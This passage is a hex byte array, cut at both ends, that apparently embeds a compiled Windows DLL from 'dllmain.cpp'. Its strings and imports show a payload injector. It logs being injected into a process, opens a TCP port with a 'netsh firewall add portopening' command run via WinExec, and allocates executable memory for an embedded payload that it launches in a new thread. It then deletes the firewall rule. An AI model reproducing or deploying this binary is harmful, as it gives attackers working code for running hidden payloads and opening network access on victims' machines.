0,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x
00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0xff,0x54,0x24,0x04,0xc2,0x04,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x81,0xec,0x1c,0x01,0x00,0x00,0x56,0x57,0xc7,0x85,0xe8,0xfe,0xff,\r\n0xff,0x00,0x00,0x00,0x00,0xff,0x15,0x24,0x20,0x00,0x10,0x50,0xff,0x15,0x20,0x20,\r\n0x00,0x10,0x50,0x68,0x8c,0x20,0x00,0x10,0x6a,0x16,0x68,0xb0,0x20,0x00,0x10,0xe8,\r\n0x7c,0x03,0x00,0x00,0x83,0xc4,0x14,0x68,0x5c,0x11,0x00,0x00,0x68,0xc0,0x20,0x00,\r\n0x10,0x6a,0x1a,0x68,0xf8,0x20,0x00,0x10,0xe8,0x63,0x03,0x00,0x00,0x83,0xc4,0x10,\r\n0x68,0x5c,0x11,0
x00,0x00,0x68,0x08,0x21,0x00,0x10,0x8d,0x85,0xf0,0xfe,0xff,0xff,\r\n0x50,0xff,0x15,0x64,0x20,0x00,0x10,0x83,0xc4,0x0c,0x6a,0x00,0x8d,0x8d,0xf0,0xfe,\r\n0xff,0xff,0x51,0xff,0x15,0x1c,0x20,0x00,0x10,0x89,0x85,0xec,0xfe,0xff,0xff,0x8b,\r\n0x95,0xec,0xfe,0xff,0xff,0x52,0x68,0x40,0x21,0x00,0x10,0x6a,0x21,0x68,0x64,0x21,\r\n0x00,0x10,0xe8,0x19,0x03,0x00,0x00,0x83,0xc4,0x10,0x6a,0x40,0x68,0x00,0x30,0x00,\r\n0x00,0x68,0x2b,0x01,0x00,0x00,0x6a,0x00,0xff,0x15,0x18,0x20,0x00,0x10,0x89,0x45,\r\n0xfc,0x83,0x7d,0xfc,0x00,0x0f,0x84,0xa1,0x00,0x00,0x00,0x8b,0x45,0xfc,0x50,0x68,\r\n0x2b,0x01,0x00,0x00,0x68,0x74,0x21,0x00,0x10,0x6a,0x28,0x68,0xac,0x21,0x00,0x10,\r\n0xe8,0xdb,0x02,0x00,0x00,0x83,0xc4,0x14,0xb9,0x4a,0x00,0x00,0x00,0xbe,0x00,0x30,\r\n0x00,0x10,0x8b,0x7d,0xfc,0xf3,0xa5,0x66,0xa5,0xa4,0x6a,0x00,0x6a,0x00,0x8b,0x4d,\r\n0xfc,0x51,0x68,0x00,0x10,0x00,0x10,0x6a,0x00,0x6a,0x00,0xff,0x15,0x14,0x20,0x00,\r\n0x10,0x89,0x85,0xe4,0xfe,0xff,0xff,0x83,0xbd,0xe4,0xfe,0xff,0xff,0x00,0x74,0x1e,\r\n0x6a,0xff,0x8b,0x95,0xe4,0xfe,0xff,0xff,0x52,0xff,0x15,0x10,0x20,0x00,0x10,0x8b,\r\n0x85,0xe4,0xfe,0xff,0xff,0x50,0xff,0x15,0x0c,0x20,0x00,0x10,0xeb,0x1b,0xff,0x15,\r\n0x08,0x20,0x00,0x10,0x50,0x68,0xbc,0x21,0x00,0x10,0x6a,0x38,0x68,0xd8,0x21,0x00,\r\n0x10,0xe8,0x6a,0x02,0x00,0x00,0x83,0xc4,0x10,0x68,0x00,0x80,0x00,0x00,0x6a,0x00,\r\n0x8b,0x4d,0xfc,0x51,0xff,0x15,0x30,0x20,0x00,0x10,0xeb,0x1b,0xff,0x15,0x08,0x20,\r\n0x00,0x10,0x50,0x68,0xe8,0x21,0x00,0x10,0x6a,0x3f,0x68,0x04,0x22,0x00,0x10,0xe8,\r\n0x3c,0x02,0x00,0x00,0x83,0xc4,0x10,0x68,0x14,0x22,0x00,0x10,0x6a,0x43,0x68,0x40,\r\n0x22,0x00,0x10,0xe8,0x28,0x02,0x00,0x00,0x83,0xc4,0x0c,0x6a,0x00,0x68,0x50,0x22,\r\n0x00,0x10,0xff,0x15,0x1c,0x20,0x00,0x10,0x89,0x85,0xec,0xfe,0xff,0xff,0x8b,0x95,\r\n0xec,0xfe,0xff,0xff,0x52,0x68,0x90,0x22,0x00,0x10,0x6a,0x45,0x68,0xb4,0x22,0x00,\r\n0x10,0xe8,0xfa,0x01,0x00,0x00,0x83,0xc4,0x10,0x68,0xc4,0x22,0x00,0x10,0x6a,0x47,\r\n0x68,0xd8,0x22,0x00,0x10,0xe8,0xe6,0x01,0x00,0x00,0x83,0xc4,0x0c,0xff,0xb5,0xe8,\r\n
0xfe,0xff,0xff,0x68,0x00,0x80,0x00,0x00,0x6a,0x00,0xff,0x75,0x08,0xff,0x35,0x5c,\r\n0x20,0x00,0x10,0xa1,0x30,0x20,0x00,0x10,0xff,0xe0,0x8b,0x85,0xe8,0xfe,0xff,0xff,\r\n0x5f,0x5e,0x8b,0xe5,0x5d,0xc2,0x04,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x56,0x8b,0x74,0x24,0x08,0x57,0x8b,0x7c,0x24,0x14,0x33,0xc0,0x85,0xff,0x76,0x08,\r\n0x88,0x04,0x30,0x40,0x3b,0xc7,0x72,0xf8,0x33,0xc0,0x85,0xff,0x76,0x13,0x8a,0x4c,\r\n0x24,0x10,0x8a,0x14,0x30,0x32,0xd0,0x02,0xd1,0x88,0x14,0x30,0x40,0x3b,0xc7,0x72,\r\n0xf1,0x5f,0x5e,0xc3,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x8b,0x44,0x24,0x08,0x81,0xec,0x10,0x02,0x00,0x00,0x83,0xe8,0x01,0x0f,0x85,0xe4,\r\n0x00,0x00,0x00,0x56,0x57,0x68,0x04,0x01,0x00,0x00,0x8d,0x84,0x24,0x18,0x01,0x00,\r\n0x00,0x50,0x6a,0x00,0xc7,0x44,0x24,0x18,0x04,0x01,0x00,0x00,0xff,0x15,0x58,0x20,\r\n0x00,0x10,0x50,0xff,0x15,0x2c,0x20,0x00,0x10,0x8d,0x4c,0x24,0x0c,0x51,0x8d,0x54,\r\n0x24,0x14,0x52,0xff,0x15,0x00,0x20,0x00,0x10,0x8d,0x44,0x24,0x10,0x50,0xff,0x15,\r\n0x20,0x20,0x00,0x10,0x50,0x8d,0x8c,0x24,0x1c,0x01,0x00,0x00,0x51,0x68,0xe8,0x22,\r\n0x00,0x10,0x6a,0x7e,0x68,0x28,0x23,0x00,0x10,0xe8,0x02,0x01,0x00,0x00,0x8b,0xbc,\r\n0x24,0x34,0x02,0x00,0x00,0x8b,0x77,0x3c,0x83,0xc4,0x18,0x8d,0x54,0x24,0x08,0x52,\r\n0x03,0xf7,0xc7,0x44,0x24,0x0c,0x00,0x00,0x00,0x00,0x8b,0x46,0x54,0x6a,0x04,0x50,\r\n0x57,0xff,0x15,0x28,0x20,0x00,0x10,0x85,0xc0,0x74,0x0f,0x8b,0x4e,0x54,0x51,0x6a,\r\n0x00,0x57,0xe8,0x19,0xff,0xff,0xff,0x83,0xc4,0x0c,0x6a,0x00,0x6a,0x00,0x57,0x68,\r\n0x10,0x10,0x00,0x10,0x6a,0x00,0x6a,0x00,0xff,0x15,0x14,0x20,0x00,0x10,0x5f,0x5e,\r\n0x85,0xc0,0x74,0x15,0x50,0xff,0x15,0x0c,0x20,0x00,0x10,0xb8,0x01,0x00,0x00,0x00,\r\n0x81,0xc4,0x10,0x02,0x00,0x00,0xc2,0x0c,0x00,0xff,0x15,0x08,0x20,0x00,0x10,0x50,\r\n0x68,0x38,0x23,0x00,0x10,0x68,0x94,0x00,0x00,0x00,0x68,0x54,0x23,0x00,0x10,0xe8,\r\n0x7c,0x00,0x00,0x00,0x83,0xc4,0x10,0xb8,0x01,0x00,0x00,0x00,0x81,0xc4,0x10,0x02,\r\n0x00,0x00,0xc2,0x0c,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xc
c,0xcc,0xcc,\r\n0x6a,0x40,0x68,0x64,0x23,0x00,0x10,0x68,0x6c,0x23,0x00,0x10,0x6a,0x00,0xff,0x15,\r\n0x68,0x20,0x00,0x10,0x6a,0x00,0xff,0x15,0x34,0x20,0x00,0x10,0xcc,0xcc,0xcc,0xcc,\r\n0x53,0x8b,0x1d,0x38,0x20,0x00,0x10,0x55,0x56,0x57,0x8b,0x7c,0x24,0x14,0x57,0x8b,\r\n0xef,0x33,0xf6,0xff,0xd3,0x85,0xc0,0x7e,0x1e,0x8d,0xa4,0x24,0x00,0x00,0x00,0x00,\r\n0x8a,0x04,0x3e,0x3c,0x5c,0x74,0x04,0x3c,0x2f,0x75,0x04,0x8d,0x6c,0x3e,0x01,0x57,\r\n0x46,0xff,0xd3,0x3b,0xf0,0x7c,0xe9,0x5f,0x5e,0x8b,0xc5,0x5d,0x5b,0xc3,0xcc,0xcc,\r\n0x51,0x56,0x8b,0x35,0x54,0x20,0x00,0x10,0x57,0x68,0x7c,0x23,0x00,0x10,0x68,0x84,\r\n0x23,0x00,0x10,0xff,0xd6,0x8b,0x3d,0x50,0x20,0x00,0x10,0x50,0xff,0xd7,0x89,0x44,\r\n0x24,0x08,0x85,0xc0,0x0f,0x84,0xf1,0x00,0x00,0x00,0x55,0x68,0x90,0x23,0x00,0x10,\r\n0x68,0x9c,0x23,0x00,0x10,0xff,0xd6,0x50,0xff,0xd7,0x8b,0xe8,0x85,0xed,0x0f,0x84,\r\n0xd6,0x00,0x00,0x00,0x68,0xa8,0x23,0x00,0x10,0x68,0xb4,0x23,0x00,0x10,0xff,0xd6,\r\n0x50,0xff,0xd7,0x85,0xc0,0x0f,0x84,0xbf,0x00,0x00,0x00,0x8b,0x54,0x24,0x1c,0x53,\r\n0x8d,0x4c,0x24,0x24,0x51,0x52,0xff,0xd0,0x8b,0x1d,0x4c,0x20,0x00,0x10,0x8b,0xf8,\r\n0x83,0xc4,0x08,0x81,0xc7,0x00,0x01,0x00,0x00,0x57,0x6a,0x00,0xff,0xd3,0x8b,0xf0,\r\n0x85,0xf6,0x0f,0x84,0x91,0x00,0x00,0x00,0x57,0x6a,0x00,0xff,0xd3,0x8b,0xf8,0x85,\r\n0xff,0x75,0x0d,0x56,0xff,0x15,0x48,0x20,0x00,0x10,0x5b,0x5d,0x5f,0x5e,0x59,0xc3,\r\n0x8b,0x4c,0x24,0x20,0x8d,0x44,0x24,0x24,0x50,0x51,0x56,0xff,0xd5,0x8b,0x54,0x24,\r\n0x28,0x8b,0x44,0x24,0x24,0x83,0xc4,0x0c,0x56,0x52,0x50,0xe8,0x00,0xff,0xff,0xff,\r\n0x83,0xc4,0x04,0x50,0xff,0x15,0x20,0x20,0x00,0x10,0x50,0x68,0xc0,0x23,0x00,0x10,\r\n0x57,0xff,0x54,0x24,0x28,0x83,0xc4,0x18,0x57,0xff,0x15,0x44,0x20,0x00,0x10,0x6a,\r\n0xf5,0xff,0x15,0x40,0x20,0x00,0x10,0x8b,0xd8,0x83,0xfb,0xff,0x74,0x1f,0x6a,0x00,\r\n0x8d,0x4c,0x24,0x14,0x51,0x56,0xc7,0x44,0x24,0x1c,0x00,0x00,0x00,0x00,0xff,0x15,\r\n0x38,0x20,0x00,0x10,0x50,0x56,0x53,0xff,0x15,0x3c,0x20,0x00,0x10,0x57,0x8b,0x3d,\r\n0x48,0x20,0x00,0x10,0xff,0xd7,0x56,0xff,0xd7,0x5b,0x
5d,0x5f,0x5e,0x59,0xc3,0xcc,\r\n0xff,0x25,0x5c,0x20,0x00,0x10,0xff,0x25,0x30,0x20,0x00,0x10,0xff,0x25,0x08,0x20,\r\n0x00,0x10,0xff,0x25,0x0c,0x20,0x00,0x10,0xff,0x25,0x10,0x20,0x00,0x10,0xff,0x25,\r\n0x14,0x20,0x00,0x10,0xff,0x25,0x18,0x20,0x00,0x10,0xff,0x25,0x1c,0x20,0x00,0x10,\r\n0xff,0x25,0x20,0x20,0x00,0x10,0xff,0x25,0x24,0x20,0x00,0x10,0xff,0x25,0x28,0x20,\r\n0x00,0x10,0xff,0x25,0x2c,0x20,0x00,0x10,0xff,0x25,0x58,0x20,0x00,0x10,0xff,0x25,\r\n0x34,0x20,0x00,0x10,0xff,0x25,0x38,0x20,0x00,0x10,0xff,0x25,0x3c,0x20,0x00,0x10,\r\n0xff,0x25,0x40,0x20,0x00,0x10,0xff,0x25,0x44,0x20,0x00,0x10,0xff,0x25,0x48,0x20,\r\n0x00,0x10,0xff,0x25,0x4c,0x20,0x00,0x10,0xff,0x25,0x50,0x20,0x00,0x10,0xff,0x25,\r\n0x54,0x20,0x00,0x10,0xff,0x25,0x64,0x20,0x00,0x10,0xff,0x25,0x68,0x20,0x00,0x10,\r\n0xff,0x25,0x00,0x20,0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x36,0x26,0x00,0x00,0x00,0x00,0x00,0x00,0xb4,0x24,0x00,0x00,0xc4,0x24,0x00,0x00,\r\n0xd2,0x24,0x00,0x00,0xe8,0x24,0x00,0x00,0xf8,0x24,0x00,0x00,0x08,0x25,0x00,0x00,\r\n0x12,0x25,0x00,0x00,0x28,0x25,0x00,0x00,0x3e,0x25,0x00,0x00,0x50,0x25,0x00,0x00,\r\n0xa6,0x24,0x00,0x00,0x7a,0x25,0x00,0x00,0x88,0x25,0x00,0x00,0x94,0x25,0x00,0x00,\r\n0xa0,0x25,0x00,0x00,0xb0,0x25,0x00,0x00,0xc6,0x25,0x00,0x00,0xd2,0x25,0x00,0x00,\r\n0xe0,0x25,0x00,0x00,0xf2,0x25,0x00,0
x00,0x66,0x25,0x00,0x00,0x98,0x24,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x10,0x26,0x00,0x00,0x1c,0x26,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x80,0x01,0xe4,0x50,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,\r\n0x61,0x00,0x00,0x00,0xb0,0x26,0x00,0x00,0xb0,0x10,0x00,0x00,0x4d,0x61,0x69,0x6e,\r\n0x54,0x68,0x72,0x65,0x61,0x64,0x28,0x29,0x3a,0x20,0x54,0x68,0x72,0x65,0x61,0x64,\r\n0x20,0x25,0x78,0x3a,0x25,0x78,0x20,0x73,0x74,0x61,0x72,0x74,0x65,0x64,0x0a,0x00,\r\n0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69,0x6e,0x2e,0x63,0x70,0x70,0x00,0x00,0x00,\r\n0x4d,0x61,0x69,0x6e,0x54,0x68,0x72,0x65,0x61,0x64,0x28,0x29,0x3a,0x20,0x41,0x64,\r\n0x64,0x69,0x6e,0x67,0x20,0x66,0x69,0x72,0x65,0x77,0x61,0x6c,0x6c,0x20,0x72,0x75,\r\n0x6c,0x65,0x20,0x66,0x6f,0x72,0x20,0x54,0x43,0x50,0x20,0x70,0x6f,0x72,0x74,0x20,\r\n0x25,0x64,0x2e,0x2e,0x2e,0x0a,0x00,0x00,0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69,\r\n0x6e,0x2e,0x63,0x70,0x70,0x00,0x00,0x00,0x63,0x6d,0x64,0x2e,0x65,0x78,0x65,0x20,\r\n0x2f,0x43,0x20,0x6e,0x65,0x74,0x73,0x68,0x20,0x66,0x69,0x72,0x65,0x77,0x61,0x6c,\r\n0x6c,0x20,0x61,0x64,0x64,0x20,0x70,0x6f,0x72,0x74,0x6f,0x70,0x65,0x6e,0x69,0x6e,\r\n0x67,0x20,0x54,0x43,0x50,0x20,0x25,0x64,0x20,0x53,0x79,0x73,0x74,0x65,0x6d,0x00,\r\n0x4d,0x61,0x69,0x6e,0x54,0x68,0x72,0x65,0x61,0x64,0x28,0x29,0x3a,0x20,0x44,0x6f,\r\n0x6e,0x65,0x20,0x28,0x65,0x78,0x69,0x74,0x20,0x63,0x6f,0x64,0x65,0x3a,0x20,0x25,\r\n0x64,0x29,0x0a,0x00,0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69,0x6e,0x2e,0x63,0x70,\r\n0x70,0x00,0x00,0x00,0x4d,0x61,0x69,0x6e,0x54,0x68,0x72,0x65,0x61,0x64,0x28,0x29,\r\n0x3a,0x20,0x41,0x6c,0x6c,0x6f,0x63,0x61,0x74,0x65,0x64,0x20,0x25,0x64,0x20,0x62,\r\n0x79,0x74,0x65,0x73,0x20,0x66,0x6f,0x72,0x20,0x70,0x61,0x79,0x6c,0x6f,0x61,0x64,\r\n0x20,0x61,0x74,0x20,0x30,0x78,0x25,0x78,0x0a,0x00,0x00,0x00,0x2e,0x5c,0x64,0x6c,\r\n0x6c,0x6d,0x61,0x69,0x6e,0x2e,0x63,0x70,0x70,0x00,0x00,0x00,0x43,0x72,0x65,0x61,\r\n0x74,0x65,0x54,0x68,0x72,0x65,0x61,0x64,0x28,0x29,0x20,0x45,0x52,0x52,0x4f,0x52,\r\n0x20,0x25,0x64,0x0a,
0x00,0x00,0x00,0x00,0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69,\r\n0x6e,0x2e,0x63,0x70,0x70,0x00,0x00,0x00,0x56,0x69,0x72,0x74,0x75,0x61,0x6c,0x41,\r\n0x6c,0x6c,0x6f,0x63,0x28,0x29,0x20,0x45,0x52,0x52,0x4f,0x52,0x20,0x25,0x64,0x0a,\r\n0x00,0x00,0x00,0x00,0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69,0x6e,0x2e,0x63,0x70,\r\n0x70,0x00,0x00,0x00,0x4d,0x61,0x69,0x6e,0x54,0x68,0x72,0x65,0x61,0x64,0x28,0x29,\r\n0x3a,0x20,0x44,0x65,0x6c,0x65,0x74,0x69,0x6e,0x67,0x20,0x66,0x69,0x72,0x65,0x77,\r\n0x61,0x6c,0x6c,0x20,0x72,0x75,0x6c,0x65,0x2e,0x2e,0x2e,0x0a,0x00,0x00,0x00,0x00,\r\n0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69,0x6e,0x2e,0x63,0x70,0x70,0x00,0x00,0x00,\r\n0x63,0x6d,0x64,0x2e,0x65,0x78,0x65,0x20,0x2f,0x43,0x20,0x6e,0x65,0x74,0x73,0x68,\r\n0x20,0x61,0x64,0x76,0x66,0x69,0x72,0x65,0x77,0x61,0x6c,0x6c,0x20,0x66,0x69,0x72,\r\n0x65,0x77,0x61,0x6c,0x6c,0x20,0x64,0x65,0x6c,0x65,0x74,0x65,0x20,0x72,0x75,0x6c,\r\n0x65,0x20,0x6e,0x61,0x6d,0x65,0x3d,0x53,0x79,0x73,0x74,0x65,0x6d,0x00,0x00,0x00,\r\n0x4d,0x61,0x69,0x6e,0x54,0x68,0x72,0x65,0x61,0x64,0x28,0x29,0x3a,0x20,0x44,0x6f,\r\n0x6e,0x65,0x20,0x28,0x65,0x78,0x69,0x74,0x20,0x63,0x6f,0x64,0x65,0x3a,0x20,0x25,\r\n0x64,0x29,0x0a,0x00,0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69,0x6e,0x2e,0x63,0x70,\r\n0x70,0x00,0x00,0x00,0x4d,0x61,0x69,0x6e,0x54,0x68,0x72,0x65,0x61,0x64,0x28,0x29,\r\n0x3a,0x20,0x45,0x58,0x49,0x54,0x0a,0x00,0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69,\r\n0x6e,0x2e,0x63,0x70,0x70,0x00,0x00,0x00,0x44,0x6c,0x6c,0x4d,0x61,0x69,0x6e,0x28,\r\n0x29,0x3a,0x20,0x49,0x6e,0x6a,0x65,0x63,0x74,0x65,0x64,0x20,0x69,0x6e,0x74,0x6f,\r\n0x20,0x70,0x72,0x6f,0x63,0x65,0x73,0x73,0x20,0x22,0x25,0x73,0x22,0x20,0x28,0x50,\r\n0x49,0x44,0x3d,0x25,0x64,0x29,0x2c,0x20,0x55,0x73,0x65,0x72,0x20,0x3d,0x20,0x22,\r\n0x25,0x73,0x22,0x0a,0x00,0x00,0x00,0x00,0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69,\r\n0x6e,0x2e,0x63,0x70,0x70,0x00,0x00,0x00,0x43,0x72,0x65,0x61,0x74,0x65,0x54,0x68,\r\n0x72,0x65,0x61,0x64,0x28,0x29,0x20,0x45,0x52,0x52,0x4f,0x52,0x20,0x25,0x64,0x0a,\r\n0x00
,0x00,0x00,0x00,0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69,0x6e,0x2e,0x63,0x70,\r\n0x70,0x00,0x00,0x00,0x44,0x75,0x6d,0x6d,0x79,0x28,0x29,0x00,0x3c,0x4f,0x4b,0x3e,\r\n0x20,0x74,0x6f,0x20,0x65,0x78,0x69,0x74,0x2e,0x2e,0x2e,0x00,0x73,0x70,0x72,0x69,\r\n0x6e,0x74,0x66,0x00,0x6d,0x73,0x76,0x63,0x72,0x74,0x2e,0x64,0x6c,0x6c,0x00,0x00,\r\n0x76,0x73,0x70,0x72,0x69,0x6e,0x74,0x66,0x00,0x00,0x00,0x00,0x6d,0x73,0x76,0x63,\r\n0x72,0x74,0x2e,0x64,0x6c,0x6c,0x00,0x00,0x5f,0x76,0x73,0x63,0x70,0x72,0x69,0x6e,\r\n0x74,0x66,0x00,0x00,0x6d,0x73,0x76,0x63,0x72,0x74,0x2e,0x64,0x6c,0x6c,0x00,0x00,\r\n0x5b,0x25,0x2e,0x35,0x64,0x5d,0x20,0x2e,0x5c,0x25,0x73,0x28,0x25,0x64,0x29,0x20,\r\n0x3a,0x20,0x25,0x73,0x00,0x00,0x00,0x00,0x30,0x24,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x02,0x26,0x00,0x00,0x08,0x20,0x00,0x00,0x8c,0x24,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x2a,0x26,0x00,0x00,0x64,0x20,0x00,0x00,\r\n0x28,0x24,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x26,0x00,0x00,\r\n0x00,0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x36,0x26,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0xb4,0x24,0x00,0x00,0xc4,0x24,0x00,0x00,0xd2,0x24,0x00,0x00,0xe8,0x24,0x00,0x00,\r\n0xf8,0x24,0x00,0x00,0x08,0x25,0x00,0x00,0x12,0x25,0x00,0x00,0x28,0x25,0x00,0x00,\r\n0x3e,0x25,0x00,0x00,0x50,0x25,0x00,0x00,0xa6,0x24,0x00,0x00,0x7a,0x25,0x00,0x00,\r\n0x88,0x25,0x00,0x00,0x94,0x25,0x00,0x00,0xa0,0x25,0x00,0x00,0xb0,0x25,0x00,0x00,\r\n0xc6,0x25,0x00,0x00,0xd2,0x25,0x00,0x00,0xe0,0x25,0x00,0x00,0xf2,0x25,0x00,0x00,\r\n0x66,0x25,0x00,0x00,0x98,0x24,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x26,0x00,0x00,\r\n0x1c,0x26,0x00,0x00,0x00,0x00,0x00,0x00,0x05,0x01,0x45,0x78,0x69,0x74,0x54,0x68,\r\n0x72,0x65,0x61,0x64,0x00,0x00,0x57,0x04,0x56,0x69,0x72,0x74,0x75,0x61,0x6c,0x46,\r\n0x72,0x65,0x65,0x00,0xe6,0x01,0x47,0x65,0x74,0x4c,0x61,0x73,0x74,0x45,0x72,0x72,\r\n0x6f,0x72,0x00,0x00,0x43,0x00,0x43,0x6c,0x6f,0x73,0x65,0x48,0x61,0x6e,0x
64,0x6c,\r\n0x65,0x00,0x64,0x04,0x57,0x61,0x69,0x74,0x46,0x6f,0x72,0x53,0x69,0x6e,0x67,0x6c,\r\n0x65,0x4f,0x62,0x6a,0x65,0x63,0x74,0x00,0xa3,0x00,0x43,0x72,0x65,0x61,0x74,0x65,\r\n0x54,0x68,0x72,0x65,0x61,0x64,0x00,0x00,0x54,0x04,0x56,0x69,0x72,0x74,0x75,0x61,\r\n0x6c,0x41,0x6c,0x6c,0x6f,0x63,0x00,0x00,0x7b,0x04,0x57,0x69,0x6e,0x45,0x78,0x65,\r\n0x63,0x00,0xaa,0x01,0x47,0x65,0x74,0x43,0x75,0x72,0x72,0x65,0x6e,0x74,0x50,0x72,\r\n0x6f,0x63,0x65,0x73,0x73,0x49,0x64,0x00,0xad,0x01,0x47,0x65,0x74,0x43,0x75,0x72,\r\n0x72,0x65,0x6e,0x74,0x54,0x68,0x72,0x65,0x61,0x64,0x49,0x64,0x00,0x00,0x5a,0x04,\r\n0x56,0x69,0x72,0x74,0x75,0x61,0x6c,0x50,0x72,0x6f,0x74,0x65,0x63,0x74,0x00,0x00,\r\n0xf4,0x01,0x47,0x65,0x74,0x4d,0x6f,0x64,0x75,0x6c,0x65,0x46,0x69,0x6c,0x65,0x4e,\r\n0x61,0x6d,0x65,0x41,0x00,0x00,0xf6,0x01,0x47,0x65,0x74,0x4d,0x6f,0x64,0x75,0x6c,\r\n0x65,0x48,0x61,0x6e,0x64,0x6c,0x65,0x41,0x00,0x00,0x04,0x01,0x45,0x78,0x69,0x74,\r\n0x50,0x72,0x6f,0x63,0x65,0x73,0x73,0x00,0xb5,0x04,0x6c,0x73,0x74,0x72,0x6c,0x65,\r\n0x6e,0x41,0x00,0x00,0x8d,0x04,0x57,0x72,0x69,0x74,0x65,0x46,0x69,0x6c,0x65,0x00,\r\n0x